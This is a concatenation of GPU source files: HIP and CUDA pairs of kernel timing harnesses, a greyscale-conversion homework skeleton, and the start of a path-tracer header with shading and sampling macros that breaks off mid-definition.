// !!! This is a file automatically generated by hipify!!! #include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <hiprand/hiprand_kernel.h> #include <stdlib.h> #include <hip/hip_runtime.h> #include <sys/time.h> #include "addOne.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { hipSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; float *vals = NULL; hipMalloc(&vals, XSIZE*YSIZE); int N = XSIZE*YSIZE; float *out = NULL; hipMalloc(&out, XSIZE*YSIZE); int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); hipFree(0);hipLaunchKernelGGL(( addOne), dim3(gridBlock),dim3(threadBlock), 0, 0, vals,N,out); hipDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {hipLaunchKernelGGL(( addOne), dim3(gridBlock),dim3(threadBlock), 0, 0, vals,N,out); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {hipLaunchKernelGGL(( addOne), dim3(gridBlock),dim3(threadBlock), 0, 0, vals,N,out); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
1da4ef47955d91f142a1299183b6514fc180728c.cu
#include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <curand_kernel.h> #include <stdlib.h> #include <cuda.h> #include <sys/time.h> #include "addOne.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { cudaSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; float *vals = NULL; cudaMalloc(&vals, XSIZE*YSIZE); int N = XSIZE*YSIZE; float *out = NULL; cudaMalloc(&out, XSIZE*YSIZE); int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); cudaFree(0); addOne<<<gridBlock,threadBlock>>>(vals,N,out); cudaDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) { addOne<<<gridBlock,threadBlock>>>(vals,N,out); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) { addOne<<<gridBlock,threadBlock>>>(vals,N,out); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
ed0af811e4bb375131531014f4086cf560bb77d0.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" // Color to Greyscale Conversion //A common way to represent color images is known as RGBA - the color //is specified by how much Red, Green, and Blue is in it. //The 'A' stands for Alpha and is used for transparency; it will be //ignored in this homework. //Each channel Red, Blue, Green, and Alpha is represented by one byte. //Since we are using one byte for each color there are 256 different //possible values for each color. This means we use 4 bytes per pixel. //Greyscale images are represented by a single intensity value per pixel //which is one byte in size. //To convert an image from color to grayscale one simple method is to //set the intensity to the average of the RGB channels. But we will //use a more sophisticated method that takes into account how the eye //perceives color and weights the channels unequally. //The eye responds most strongly to green followed by red and then blue. //The NTSC (National Television System Committee) recommends the following //formula for color to greyscale conversion: //I = .299f * R + .587f * G + .114f * B //Notice the trailing f's on the numbers which indicate that they are //single precision floating point constants and not double precision //constants. #include "reference_calc.cpp" #include "utils.h" #include <stdio.h> __global__ void rgba_to_greyscale(const uchar4* const rgbaImage, unsigned char* const greyImage, int numRows, int numCols) { //TODO //Fill in the kernel to convert from color to greyscale //the mapping from components of a uchar4 to RGBA is: // .x -> R ; .y -> G ; .z -> B ; .w -> A // //The output (greyImage) at each pixel should be the result of //applying the formula: output = .299f * R + .587f * G + .114f * B; //Note: We will be ignoring the alpha channel for this conversion //First create a mapping from the 2D block and grid locations //to an absolute 2D location in the image, then use that to //calculate a 1D offset } void your_rgba_to_greyscale(const uchar4 * const h_rgbaImage, uchar4 * const d_rgbaImage, unsigned char* const d_greyImage, size_t numRows, size_t numCols) { //You must fill in the correct sizes for the blockSize and gridSize //currently only one block with one thread is being launched const dim3 blockSize(1, 1, 1); //TODO const dim3 gridSize( 1, 1, 1); //TODO hipLaunchKernelGGL(( rgba_to_greyscale), dim3(gridSize), dim3(blockSize), 0, 0, d_rgbaImage, d_greyImage, numRows, numCols); hipDeviceSynchronize(); checkCudaErrors(hipGetLastError()); }
ed0af811e4bb375131531014f4086cf560bb77d0.cu
// Color to Greyscale Conversion //A common way to represent color images is known as RGBA - the color //is specified by how much Red, Green, and Blue is in it. //The 'A' stands for Alpha and is used for transparency; it will be //ignored in this homework. //Each channel Red, Blue, Green, and Alpha is represented by one byte. //Since we are using one byte for each color there are 256 different //possible values for each color. This means we use 4 bytes per pixel. //Greyscale images are represented by a single intensity value per pixel //which is one byte in size. //To convert an image from color to grayscale one simple method is to //set the intensity to the average of the RGB channels. But we will //use a more sophisticated method that takes into account how the eye //perceives color and weights the channels unequally. //The eye responds most strongly to green followed by red and then blue. //The NTSC (National Television System Committee) recommends the following //formula for color to greyscale conversion: //I = .299f * R + .587f * G + .114f * B //Notice the trailing f's on the numbers which indicate that they are //single precision floating point constants and not double precision //constants. #include "reference_calc.cpp" #include "utils.h" #include <stdio.h> __global__ void rgba_to_greyscale(const uchar4* const rgbaImage, unsigned char* const greyImage, int numRows, int numCols) { //TODO //Fill in the kernel to convert from color to greyscale //the mapping from components of a uchar4 to RGBA is: // .x -> R ; .y -> G ; .z -> B ; .w -> A // //The output (greyImage) at each pixel should be the result of //applying the formula: output = .299f * R + .587f * G + .114f * B; //Note: We will be ignoring the alpha channel for this conversion //First create a mapping from the 2D block and grid locations //to an absolute 2D location in the image, then use that to //calculate a 1D offset } void your_rgba_to_greyscale(const uchar4 * const h_rgbaImage, uchar4 * const d_rgbaImage, unsigned char* const d_greyImage, size_t numRows, size_t numCols) { //You must fill in the correct sizes for the blockSize and gridSize //currently only one block with one thread is being launched const dim3 blockSize(1, 1, 1); //TODO const dim3 gridSize( 1, 1, 1); //TODO rgba_to_greyscale<<<gridSize, blockSize>>>(d_rgbaImage, d_greyImage, numRows, numCols); cudaDeviceSynchronize(); checkCudaErrors(cudaGetLastError()); }
43e68550dc66257b393c79b64b0e59eaedc33496.hip
// !!! This is a file automatically generated by hipify!!! #include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <hiprand/hiprand_kernel.h> #include <stdlib.h> #include <hip/hip_runtime.h> #include <sys/time.h> #include "_l1reg.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { hipSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; int n = XSIZE*YSIZE; float l1 = 1; float *w = NULL; hipMalloc(&w, XSIZE*YSIZE); float *dw = NULL; hipMalloc(&dw, XSIZE*YSIZE); int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); hipFree(0);hipLaunchKernelGGL(( _l1reg), dim3(gridBlock),dim3(threadBlock), 0, 0, n,l1,w,dw); hipDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {hipLaunchKernelGGL(( _l1reg), dim3(gridBlock),dim3(threadBlock), 0, 0, n,l1,w,dw); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {hipLaunchKernelGGL(( _l1reg), dim3(gridBlock),dim3(threadBlock), 0, 0, n,l1,w,dw); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
43e68550dc66257b393c79b64b0e59eaedc33496.cu
#include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <curand_kernel.h> #include <stdlib.h> #include <cuda.h> #include <sys/time.h> #include "_l1reg.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { cudaSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; int n = XSIZE*YSIZE; float l1 = 1; float *w = NULL; cudaMalloc(&w, XSIZE*YSIZE); float *dw = NULL; cudaMalloc(&dw, XSIZE*YSIZE); int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); cudaFree(0); _l1reg<<<gridBlock,threadBlock>>>(n,l1,w,dw); cudaDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) { _l1reg<<<gridBlock,threadBlock>>>(n,l1,w,dw); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) { _l1reg<<<gridBlock,threadBlock>>>(n,l1,w,dw); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
edeabfd7a613e9eaf6a420a69b425f51352b9c96.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <cstdio> #include <cstdint> #include <cfloat> #include "helper_math.cu.h" /// extern "C" { /// typedef struct TreeTriangle { float vertex[3]; float edges[2][3]; float vertex_normals[3][3]; float vertex_tangents[3][4]; float vertex_uvs[3][2]; float surface_normal[3]; float inverse_area; uint32_t material_id; uint32_t pad; } TreeTriangle; /// #define TRI_VERTEX (tri_pixel) #define TRI_EDGES_0 (tri_pixel + 3) #define TRI_EDGES_1 (tri_pixel + 6) #define TRI_VN_0 (tri_pixel + 9) #define TRI_VN_1 (tri_pixel + 12) #define TRI_VN_2 (tri_pixel + 15) #define TRI_VT_0 (tri_pixel + 18) #define TRI_VT_1 (tri_pixel + 22) #define TRI_VT_2 (tri_pixel + 26) #define TRI_UV_0 (tri_pixel + 30) #define TRI_UV_1 (tri_pixel + 32) #define TRI_UV_2 (tri_pixel + 34) #define TRI_SURF_N (tri_pixel + 36) #define TRI_INV_AREA (tri_pixel + 39) #define TRI_MAT_ID (tri_pixel + 40) /// /* typedef struct FourNode { uint32_t child[4]; uint32_t extra[2]; float ll_bounds[6]; float lr_bounds[6]; float rl_bounds[6]; float rr_bounds[6]; float padding[2]; } FourNode; /// #define NODE_LL (node_pixel + 0) #define NODE_LR (node_pixel + 1) #define NODE_RL (node_pixel + 2) #define NODE_RR (node_pixel + 3) #define NODE_EXTRA_0 (node_pixel + 4) #define NODE_EXTRA_1 (node_pixel + 5) #define NODE_LL_BOUNDS (node_pixel + 6) #define NODE_LR_BOUNDS (node_pixel + 12) #define NODE_RL_BOUNDS (node_pixel + 18) #define NODE_RR_BOUNDS (node_pixel + 24) */ /// typedef struct TwoNode { uint32_t child[2]; uint32_t extra[2]; float l_bounds[6]; float r_bounds[6]; } TwoNode; /// #define NODE_L (node_pixel + 0) #define NODE_R (node_pixel + 1) #define NODE_EXTRA_0 (node_pixel + 2) #define NODE_EXTRA_1 (node_pixel + 3) #define NODE_L_BOUNDS (node_pixel + 4) #define NODE_R_BOUNDS (node_pixel + 10) /// typedef struct Camera { float aperture_size; float focal_depth; float transform[16]; float root_pixel[2]; float pixel_offset[2]; float image_plane_distance; float padding; } Camera; /// typedef struct Material { uint32_t map_flags; int32_t double_sided; float albedo[4]; float metallic; float smoothness; float glass; float emission; float albedo_bounds[4]; float normal_bounds[4]; float metallic_bounds[4]; float emission_bounds[4]; } Material; /// typedef struct Sun { float direction[4]; float sun_intensity; float sky_intensity; float color[4]; } Sun; /// typedef struct EnvironmentProperties { float intensity; float rotation; } EnvironmentProperties; /// typedef struct EmitterIndex { uint mesh_triangle_offset; uint triangle_offset; } EmitterIndex; /// typedef struct PortalIndex { uint mesh_triangle_offset; uint triangle_offset; } PortalIndex; /// typedef struct ImageProperties { int tonemap; float gamma; float exposure; float contrast; float saturation; float brightness; } ImageProperties; /// #define TREE_LEAF_TRIANGLE_FACTOR 3 /// #define HM_TEST_NODES 0x0 #define HM_LEFT 0x2 #define HM_RIGHT 0x1 #define HM_BOTH 0x3 /// #define LB_NEW_SUB_TREE 0xFFFFFFFF /// #define TREE_LEAF 0x80000000 #define TREE_LEAF_MASK 0x7FFFFFFF #define TREE_SUB_TREE 0x40000000 #define TREE_SUB_TREE_MASK 0x3FFFFFFF #define TREE_TRAIL_END 0x7FFFFFFF #define TREE_NO_LEAF_HIT 0xFFFFFFFF #define NO_TRI_HIT INT_MAX /// #define DOUBLE_SIDED_FLAG 0x80000000 #define DOUBLE_SIDED_MASK 0x7FFFFFFF /// #define THROUGHPUT_THRESHOLD 0.05f /// #define DIRAC_PDF FLT_MAX /// #define MAP_FLAG_ALBEDO 0x1 #define MAP_FLAG_NORMAL 0x2 #define MAP_FLAG_METALLIC 0x4 #define MAP_FLAG_EMISSION 0x8 /// #define SUN_COS_THETA 0.9996f /// #define STATE_ENVIRONMENT 0x0 #define STATE_EMISSIVE 0x1 #define STATE_MATERIAL 0x2 #define STATE_SECONDARY 0x3 #define STATE_END 0x4 /// #define RS_STATE (ray_count * 0 + global_id) #define RS_ORIGIN_X (ray_count * 1 + global_id) #define RS_ORIGIN_Y (ray_count * 2 + global_id) #define RS_ORIGIN_Z (ray_count * 3 + global_id) #define RS_DIR_X (ray_count * 4 + global_id) #define RS_DIR_Y (ray_count * 5 + global_id) #define RS_DIR_Z (ray_count * 6 + global_id) #define RS_U (ray_count * 7 + global_id) #define RS_V (ray_count * 8 + global_id) #define RS_HIT_DISTANCE (ray_count * 9 + global_id) #define RS_TRI_INDEX (ray_count * 10 + global_id) #define RS_LAST_BRDF_PDF (ray_count * 11 + global_id) #define RS_THROUGHPUT_R (ray_count * 12 + global_id) #define RS_THROUGHPUT_G (ray_count * 13 + global_id) #define RS_THROUGHPUT_B (ray_count * 14 + global_id) #define RS_COLOR_R (ray_count * 15 + global_id) #define RS_COLOR_G (ray_count * 16 + global_id) #define RS_COLOR_B (ray_count * 17 + global_id) #define RS_SUN_D_X (ray_count * 18 + global_id) #define RS_SUN_D_Y (ray_count * 19 + global_id) #define RS_SUN_D_Z (ray_count * 20 + global_id) #define RS_SUN_R (ray_count * 21 + global_id) #define RS_SUN_G (ray_count * 22 + global_id) #define RS_SUN_B (ray_count * 23 + global_id) #define RS_EMITTER_D_X (ray_count * 24 + global_id) #define RS_EMITTER_D_Y (ray_count * 25 + global_id) #define RS_EMITTER_D_Z (ray_count * 26 + global_id) #define RS_EMITTER_T (ray_count * 27 + global_id) #define RS_EMITTER_R (ray_count * 28 + global_id) #define RS_EMITTER_G (ray_count * 29 + global_id) #define RS_EMITTER_B (ray_count * 30 + global_id) #define RS_PORTAL_D_X (ray_count * 31 + global_id) #define RS_PORTAL_D_Y (ray_count * 32 + global_id) #define RS_PORTAL_D_Z (ray_count * 33 + global_id) #define RS_PORTAL_R (ray_count * 34 + global_id) #define RS_PORTAL_G (ray_count * 35 + global_id) #define RS_PORTAL_B (ray_count * 36 + global_id) /// #define GET_GLOBAL_ID() \ ((blockIdx.y * gridDim.x + blockIdx.x) * \ (blockDim.x * blockDim.y) + \ (threadIdx.y * blockDim.x + threadIdx.x)) /// #define HI_EPSILON 0.01f #define EPSILON 0.0001f #define LO_EPSILON 0.000001f #define PI 3.14159265359f #define INV_PI 0.31830988618f #define TAU 6.28318530718f #define INV_TAU 0.15915494309 /// #define PRNG(P, SEED, R) \ { \ uint hash = SEED; \ hash ^= P; \ hash += (hash << 10); \ hash ^= (hash >> 6); \ hash += (hash << 3); \ hash ^= (hash >> 11); \ hash += (hash << 15); \ hash ^= hash >> 16; \ hash *= 0x85EBCA6B; \ hash ^= hash >> 13; \ hash *= 0xC2B2AE35; \ hash ^= hash >> 16; \ hash &= 0x007FFFFFu; \ hash |= 0x3F800000u; \ R = *((float*)&hash) - 1.0f; \ R = fmax(EPSILON, R); \ } /// #define TRANSFORM_X(P, MAT, R) { \ R[0] = P[0] * MAT[0] + P[1] * MAT[4] + P[2] * MAT[8] + MAT[12]; \ } #define TRANSFORM_Y(P, MAT, R) { \ R[1] = P[0] * MAT[1] + P[1] * MAT[5] + P[2] * MAT[9] + MAT[13]; \ } #define TRANSFORM_Z(P, MAT, R) { \ R[2] = P[0] * MAT[2] + P[1] * MAT[6] + P[2] * MAT[10] + MAT[14]; \ } #define TRANSFORM_W(P, MAT, R) { \ R[3] = P[0] * MAT[3] + P[1] * MAT[7] + P[2] * MAT[11] + MAT[15]; \ } /// #define DOT(A, B) (A[0] * B[0] + A[1] * B[1] + A[2] * B[2]) /// #define CROSS(A, B, C) { \ C[0] = A[1] * B[2] - A[2] * B[1]; \ C[1] = A[2] * B[0] - A[0] * B[2]; \ C[2] = A[0] * B[1] - A[1] * B[0]; \ } /// #define NOT_ZERO(A) copysignf(fmax(LO_EPSILON, fabs(A)), (A)) /// #define NORMALIZE(V) \ { \ float length = sqrt(V[0] * V[0] + V[1] * V[1] + V[2] * V[2]); \ float inv_length = 1.0f / NOT_ZERO(length); \ V[0] *= inv_length; \ V[1] *= inv_length; \ V[2] *= inv_length; \ } /// #define GGX_SAMPLE(D_I, ROUGHNESS, RXF, RYF, N) \ { \ float stretched[3]; \ stretched[0] = ROUGHNESS[0] * D_I[0]; \ stretched[1] = ROUGHNESS[1] * D_I[1]; \ stretched[2] = D_I[2]; \ NORMALIZE(stretched); \ float up[3]; \ up[0] = 0.0f; \ up[1] = 0.0f; \ up[2] = 1.0f; \ float t1[3]; \ CROSS(stretched, up, t1); \ if (stretched[2] < 0.9999f) { \ NORMALIZE(t1); \ } else { \ t1[0] = 1.0f; \ t1[1] = 0.0f; \ t1[2] = 0.0f; \ } \ float t2[3]; \ CROSS(t1, stretched, t2); \ float a = 1.0f / (1.0f + stretched[2]); \ float r = sqrt(RXF); \ float phi = (RYF < a) ? RYF / a * PI : PI + (RYF - a) / (1.0f - a) * PI; \ float p1 = r * cos(phi); \ float p2 = r * sin(phi) * ((RYF < a) ? 1.0f : stretched[2]); \ N[0] = ROUGHNESS[0] * \ (p1 * t1[0] + p2 * t2[0] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[0]); \ N[1] = ROUGHNESS[1] * \ (p1 * t1[1] + p2 * t2[1] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[1]); \ N[2] = (p1 * t1[2] + p2 * t2[2] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[2]); \ NORMALIZE(N); \ } /// #define TAN_THETA(V, T) \ { \ float temp = 1.0f - V[2] * V[2]; \ if (temp <= 0.0f) { \ T = 0.0f; \ } else { \ T = sqrt(temp) / V[2]; \ } \ } /// #define SIN_THETA_2(V, T) \ { \ T = 1.0f - V[2] * V[2]; \ } /// #define PROJECT_ROUGHNESS(V, ROUGHNESS, R) \ { \ float sin_theta_2; \ SIN_THETA_2(V, sin_theta_2); \ float inv_sin_theta_2 = 1.0f / sin_theta_2; \ if ((ROUGHNESS[0] == ROUGHNESS[1]) || (inv_sin_theta_2 <= 0.0f)) { \ R = ROUGHNESS[0]; \ } else { \ float cos_phi_2 = V[0] * V[0] * inv_sin_theta_2; \ float sin_phi_2 = V[1] * V[1] * inv_sin_theta_2; \ R = sqrt(cos_phi_2 * ROUGHNESS[0] * ROUGHNESS[0] + \ sin_phi_2 * ROUGHNESS[1] * ROUGHNESS[1]); \ } \ } /// #define HYPOT_2(A, B, R) \ { \ if (fabs(A) > fabs(B)) { \ R = B / A; \ R = fabs(A) * sqrt(1.0f + R * R); \ } else if (B != 0.0f) { \ R = A / B; \ R = fabs(B) * sqrt(1.0f + R * R); \ } else {\ R = 0.0f; \ } \ } /// #define SMITH_G1(V, N, ROUGHNESS, G1) \ { \ if ((DOT(N, V) * V[2]) <= 0.0f) { \ G1 = 0.0f; \ } else { \ float tan_theta; \ TAN_THETA(V, tan_theta); \ tan_theta = fabs(tan_theta); \ if (tan_theta == 0.0f) { \ G1 = 1.0f; \ } else { \ float alpha; \ PROJECT_ROUGHNESS(V, ROUGHNESS, alpha); \ float root = alpha * tan_theta; \ float hypot_2; \ HYPOT_2(1.0f, root, hypot_2); \ G1 = 2.0f / (1.0f + hypot_2); \ } \ } \ } /// #define GGX_EVAL(N, ROUGHNESS, R) \ { \ if (N[2] <= 0.0f) { \ R = 0.0f; \ } else { \ float cos_theta_2 = N[2] * N[2]; \ float exponent = ((N[0] * N[0]) / (ROUGHNESS[0] * ROUGHNESS[0]) + \ (N[1] * N[1]) / (ROUGHNESS[1] * ROUGHNESS[1])) / cos_theta_2; \ float root = (1.0f + exponent) * cos_theta_2; \ R = 1.0f / (PI * ROUGHNESS[0] * ROUGHNESS[1] * root * root); \ } \ } /// #define AVG_TONEMAP(RGB) \ { \ RGB[0] *= inv_sample_count; \ RGB[1] *= inv_sample_count; \ RGB[2] *= inv_sample_count; \ RGB[0] *= image_properties.exposure + 2.0f; \ RGB[1] *= image_properties.exposure + 2.0f; \ RGB[2] *= image_properties.exposure + 2.0f; \ if (image_properties.tonemap) { \ RGB[0] = ((RGB[0] * (0.15f * RGB[0] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[0] * (0.15f * RGB[0] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ RGB[1] = ((RGB[1] * (0.15f * RGB[1] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[1] * (0.15f * RGB[1] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ RGB[2] = ((RGB[2] * (0.15f * RGB[2] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[2] * (0.15f * RGB[2] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ float whitescale = 11.2f; \ whitescale = ((whitescale * (0.15f * whitescale + 0.10f * 0.5f) + \ 0.20f * 0.02f) / (whitescale * (0.15f * whitescale + 0.5f) + \ 0.2f * 0.3f)) - (0.02f / 0.3f); \ whitescale = 1.0f / whitescale; \ RGB[0] *= whitescale; \ RGB[1] *= whitescale; \ RGB[2] *= whitescale; \ } \ RGB[0] = pow(RGB[0], 1.0f / image_properties.gamma); \ RGB[1] = pow(RGB[1], 1.0f / image_properties.gamma); \ RGB[2] = pow(RGB[2], 1.0f / image_properties.gamma); \ } /// #define MIS(A, B) ((A * A) / (A * A + B * B)) /// #define CONCENTRIC_HEMI(R0, R1, D) \ { \ R0 = 2.0f * R0 - 1.0f; \ R1 = 2.0f * R1 - 1.0f; \ float phi, r; \ if (R0 == 0.0f && R1 == 0.0f) { \ r = phi = 0.0f; \ } else if ((R0 * R0) > (R1 * R1)) { \ r = R0; \ phi = (PI * 0.25f) * (R1 / (R0)); \ } else { \ r = R1; \ phi = (PI * 0.5f) - (R0 / (R1)) * (PI * 0.25f); \ } \ float cos_phi = cos(phi); \ float sin_phi = sin(phi); \ D[0] = r * cos_phi; \ D[1] = r * sin_phi; \ D[2] = sqrt(fmax(0.0f, 1.0f - D[0] * D[0] - D[1] * D[1])); \ NORMALIZE(D); \ } /// #define GET_BASIS(N, T, B) \ {\ float z = 1.0f + N[2]; \ float a = 1.0f / NOT_ZERO(z); \ float b = -N[0] * N[1] * a; \ T[0] = 1.0f - N[0] * N[0] * a; \ T[1] = b; \ T[2] = -N[0]; \ B[0] = b; \ B[1] = 1.0f - N[1] * N[1] * a; \ B[2] = -N[1]; \ } /// #define GET_VT_BASIS(N, T, B) \ {\ float flip_binormal; \ if (use_triangles_image) { \ T[0] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2); \ T[1] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 1) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 1) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 1); \ T[2] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 2) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 2) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 2); \ flip_binormal = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 3) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 3) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 3); \ } else { \ T[0] = w * triangles[tri_index].vertex_tangents[0][0] + \ u * triangles[tri_index].vertex_tangents[1][0] + \ v * triangles[tri_index].vertex_tangents[2][0]; \ T[1] = w * triangles[tri_index].vertex_tangents[0][1] + \ u * triangles[tri_index].vertex_tangents[1][1] + \ v * triangles[tri_index].vertex_tangents[2][1]; \ T[2] = w * triangles[tri_index].vertex_tangents[0][2] + \ u * triangles[tri_index].vertex_tangents[1][2] + \ v * triangles[tri_index].vertex_tangents[2][2]; \ flip_binormal = w * triangles[tri_index].vertex_tangents[0][3] + \ u * triangles[tri_index].vertex_tangents[1][3] + \ v * triangles[tri_index].vertex_tangents[2][3]; \ } \ CROSS(N, T, B); \ if (flip_binormal < 0.0f) { \ B[0] = -B[0]; \ B[1] = -B[1]; \ B[2] = -B[2]; \ } \ } /// #define RELATIVE_TO_BASIS(V, N, T, B, D) \ {\ D[0] = DOT(V, T); \ D[1] = DOT(V, B); \ D[2] = DOT(V, N); \ } /// #define ROTATE_TO_BASIS(V, N, T, B, D) \ {\ D[0] = V[0] * T[0] + V[1] * B[0] + V[2] * N[0]; \ D[1] = V[0] * T[1] + V[1] * B[1] + V[2] * N[1]; \ D[2] = V[0] * T[2] + V[1] * B[2] + V[2] * N[2]; \ } /// #define CONDUCTOR_FRESNEL(I, IOR, K, F) \ { \ float cos_theta_2 = I * I; \ float temp = (IOR * IOR + K * K) * cos_theta_2; \ float rp2 = (temp - (IOR * (2.0f * I)) + 1.0f) / \ (temp + (IOR * (2.0f * I)) + 1.0f); \ float tempf = IOR * IOR + K * K; \ float rs2 = (tempf - (IOR * (2.0f * I)) + cos_theta_2) / \ (tempf + (IOR * (2.0f * I)) + cos_theta_2); \ F = 0.5f * (rp2 + rs2); \ } /// #define DIELECTRIC_FRESNEL(I, IOR, COS_THETA_T, F) \ { \ float scale = (I > 0.0f) ? 1.0f / IOR : IOR; \ float cos_theta_t2 = 1.0f - (1.0f - I * I) * (scale * scale); \ if (cos_theta_t2 < 0.0f) { \ 